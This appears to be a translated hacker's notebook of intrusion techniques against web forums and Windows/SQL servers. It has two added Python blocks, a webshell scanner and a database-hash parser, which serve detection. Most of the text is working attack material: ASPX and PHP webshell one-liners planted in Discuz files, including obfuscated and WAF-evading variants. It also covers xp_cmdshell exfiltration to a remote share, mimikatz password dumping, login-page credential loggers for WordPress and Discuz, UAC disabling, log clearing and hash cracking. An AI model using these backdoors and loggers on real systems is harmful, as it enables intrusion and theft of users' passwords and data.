(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-liner backdoor address is http://somesite.com.cn/tools/rss.aspx, password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively compress website
Mind the path of rar.exe

<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner: inserting a one-liner trojan through an unfiltered field

Database-dumping tricks when the web server and database server are separated
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
Constraints mean a full webshell can't be written, only a one-liner, which is actually enough to do anything; it's just not intuitive or convenient, e.g. for dumping the database.
What's used here is the client's expert mode (write the code yourself).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file every 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);


// delete after downloading


ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collect OS fingerprints
Scan all ports of 192.168.1.100
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org  identifies the name servers and gets DNS information
host -l www.owasp.org ns1.secure.net  attempts a zone transfer for owasp.org
Netcraft's DNS search service, at http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still non-public)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing a database shows the error "Data too long for column 'username' at row 1". The cause is that Chinese characters are not supported.

Changing the MySQL password
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner trojan backdoors

Many advanced PHP one-liner trojans were found during intrusions. Recording them here so they can be searched for and removed by keyword later.
1.

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

// Caidao (China Chopper) one-liner

2.

$filename=$_GET['xbid'];

include ($filename);

// dangerous include function: compiles any file as PHP and runs it

3.

$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames any file

4.

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST['h'],"Access");

// Caidao one-liner
5. include ($uid);

// dangerous include function: compiles any file as PHP and runs it, via POST

// one-liner embedded in a gif

6. Typical one-liners
Backdoor code
<?php eval_r($_POST[sb])?>
Code
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Code
<?php assert($_POST[sb]);?>
// use the expert mode of the lanker one-liner client to execute the relevant PHP statements
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, when configuring the connection in the Caidao one-liner client, enter the following in the "config" field:
Code
<O>h=@eval_r($_POST[c]);</O>
Code
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses a restriction on <?
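The stated purpose of the list above is to search for these patterns later. As an added example, not from the original post, here is a small Python scanner that flags the shapes shown in items 1 to 6 and in the earlier "0${@eval(...)}" one-liner: spliced function names, /e regex modifiers, eval/assert fed from request data, variable-function calls named by the request, include of request input, and PHP inside a <script language="php"> tag. The sample files and signature names are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Line-level signatures derived from the one-liner variants listed above.
# They match on shape rather than exact text, so they are heuristics: review
# every hit by hand and expect the odd false positive on unusual benign code.
SIGNATURES = [
    # "p"."r"."e"."g"...: a function name spliced from single-character strings
    ("spliced-function-name", re.compile(r'(?:"[A-Za-z_]"\s*\.\s*){3,}"[A-Za-z_]"')),
    # a regex literal whose modifiers include /e (the replacement is evaluated)
    ("regex-e-modifier", re.compile(r'["\']/[^"\']*/[imsxu]*e[imsxu]*["\']')),
    # eval / eval_r / assert fed directly from a request superglobal
    ("eval-on-request", re.compile(r'\b(?:eval(?:_r)?|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b')),
    # $_POST['sa']($_POST['sb']): a variable-function call named by the request
    ("variable-function-on-request", re.compile(r'\$_(?:POST|GET|REQUEST)\s*\[[^\]]+\]\s*\(')),
    # "0${@eval(...)}": eval hidden inside string interpolation
    ("eval-in-string-interpolation", re.compile(r'\$\{\s*@?eval')),
    # <script language="php">: PHP without "<?", used to get past "<?" filters
    ("script-language-php", re.compile(r'<script\s+language\s*=\s*["\']php["\']', re.I)),
]
# Variables assigned straight from a request superglobal or from a spliced string.
TAINT_FROM_REQUEST = re.compile(r'\$(\w+)\s*=\s*\$_(?:POST|GET|REQUEST|COOKIE)\b')
TAINT_FROM_SPLICE = re.compile(r'\$(\w+)\s*=\s*(?:"[A-Za-z_]"\s*\.\s*){3,}"[A-Za-z_]"')


def scan_php(source: str) -> List[Tuple[int, str]]:
    """Return (line_number, signature_name) pairs for one PHP source text."""
    tainted = set(TAINT_FROM_REQUEST.findall(source)) | set(TAINT_FROM_SPLICE.findall(source))
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, rx in SIGNATURES:
            if rx.search(line):
                hits.append((lineno, name))
        for var in sorted(tainted):
            # include($filename) where $filename came from $_GET (items 2 and 5)
            if re.search(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$' + re.escape(var) + r'\b', line):
                hits.append((lineno, "include-of-tainted-variable"))
            # $hh(...) where $hh was spliced together (items 1, 3 and 4)
            if re.search(r'\$' + re.escape(var) + r'\s*\(', line):
                hits.append((lineno, "call-through-tainted-variable"))
    return hits


def scan_files(files: Dict[str, str]) -> Dict[str, List[Tuple[int, str]]]:
    """Scan several sources; only files with at least one hit are reported."""
    return {path: h for path, h in ((p, scan_php(s)) for p, s in files.items()) if h}


# Constructed sample files mirroring the variants listed above, plus one clean file.
SAMPLES: Dict[str, str] = {
    "item1.php": '<?php\n$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";\n'
                 '$hh("/[discuz]/e",$_POST[\'h\'],"Access");\n',
    "item2.php": "<?php\n$filename=$_GET['xbid'];\ninclude ($filename);\n",
    "item6.php": "<?$_POST['sa']($_POST['sb']);?>\n",
    "notag.php": '<script language="php">@eval_r($_POST[sb])</script>\n',
    "clean.php": "<?php\n$name = $_GET['n'];\necho htmlspecialchars($name);\ninclude 'header.php';\n",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLES).items():
        for lineno, name in hits:
            print(f"{path}:{lineno}: {name}")
```

Run it over a real web root by reading each .php file into the dictionary instead of SAMPLES; treat hits as leads for manual review, not as proof.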

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Quit with exit; don't close the window directly or the system will crash.

http://www.monyer.com/demo/monyerjs/  a fairly comprehensive JS decoding site
Automatically check for critical system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

One-liner aspx backdoor that gets past Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell, to aid further social engineering
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login, the password-logging code is triggered; of course you can also put this code in the default branch of the switch...case statement.
Just search for case 'login'
and insert it directly beneath; the logged passwords end up in pwd.txt.
Actually modifying wp-login.php is not a good approach, it's easily discovered; there are other methods too, just noting this one.
Code using the IIS6 file-parsing vulnerability to bypass Safedog:
;antian365.asp;antian365.jpg

Grabbing hashes from all kinds of databases to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use the function fn_varbintohexstr() to cast the password to a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
usename  | passwd
---------+------------------------------------
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, i am a bit bored....
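As an added example, not from the original post: a Python helper that splits the hash formats described above (SQL Server 2000/2005 0x0100 values, MySQL 4.1+ PASSWORD(), Postgres pg_shadow md5) into their fields and checks a password you already know against them, for instance to confirm that a rotated sa password actually took effect or that a stored value is in the expected format. The SQL Server 2000 value is the one quoted above; the other inputs are constructed.

```python
import hashlib
from typing import Dict


def parse_mssql_hash(value: str) -> Dict[str, str]:
    """Split a SQL Server pwdencrypt() value into the fields described above:
    0x0100 header, 4-byte salt, SHA-1(UTF-16LE password + salt); a SQL Server
    2000 value carries a second SHA-1 over the upper-cased password + salt."""
    h = value.lower()
    if h.startswith("0x"):
        h = h[2:]
    if not h.startswith("0100") or len(h) not in (52, 92):
        raise ValueError("not a 0x0100-format SQL Server hash")
    fields = {"header": h[:4], "salt": h[4:12], "case_hash": h[12:52]}
    if len(h) == 92:
        fields["upper_hash"] = h[52:92]
    return fields


def mssql_digest(password: str, salt: bytes) -> str:
    # SQL Server hashes the password as UTF-16LE with the salt appended.
    return hashlib.sha1(password.encode("utf-16-le") + salt).hexdigest()


def make_mssql_hash(password: str, salt: bytes, sql2000: bool = False) -> str:
    """Build a value in the stored format (used here to produce test values)."""
    out = "0100" + salt.hex() + mssql_digest(password, salt)
    if sql2000:
        out += mssql_digest(password.upper(), salt)
    return "0x" + out.upper()


def verify_mssql(value: str, password: str) -> bool:
    """True if the candidate matches the case-sensitive hash (2000 and 2005)."""
    f = parse_mssql_hash(value)
    return mssql_digest(password, bytes.fromhex(f["salt"])) == f["case_hash"]


def mysql41_hash(password: str) -> str:
    # MySQL >= 4.1 PASSWORD(): '*' + upper-hex SHA-1 of the SHA-1 of the password.
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def verify_mysql41(stored: str, password: str) -> bool:
    return stored.upper() == mysql41_hash(password)


def pg_md5_hash(password: str, username: str) -> str:
    # pg_shadow stores 'md5' + hex MD5 of the password concatenated with the role name.
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def verify_pg_md5(stored: str, username: str, password: str) -> bool:
    return stored == pg_md5_hash(password, username)


if __name__ == "__main__":
    # The SQL Server 2000 value quoted above, split into its fields.
    sample = ("0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341"
              "2FD54D6119FFF04129A1D72E7C3194F7284A7F3A")
    for k, v in parse_mssql_hash(sample).items():
        print(f"{k:10s} {v}")
    print(mysql41_hash("mypass"))  # compare with the PASSWORD('mypass') output above
```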
Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing SQL Server 2008 logs; be sure to back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51

Changing file permissions on Windows 2008
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First look in the right-click menu for "管理员取得所有权" (Take ownership as administrator); if it isn't there,
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"


Import this .reg to add the Win7 right-click "管理员取得所有权" (Take ownership as administrator) entry
II. Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui",
1. The "notepad.exe" under C:\Windows does not need replacing
2. The "notepad.exe" under C:\Windows\System32 does not need replacing
3. Ignore the four "notepad.exe.mui"
4. Mainly replace the "notepad.exe" under the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
Replacement method: first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders to replace them,
After replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
add the following code; csslog.php is generated automatically in the site's ./data/cache/ directory.
You can add a view.php under the ipdata directory to view the records; the password is: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);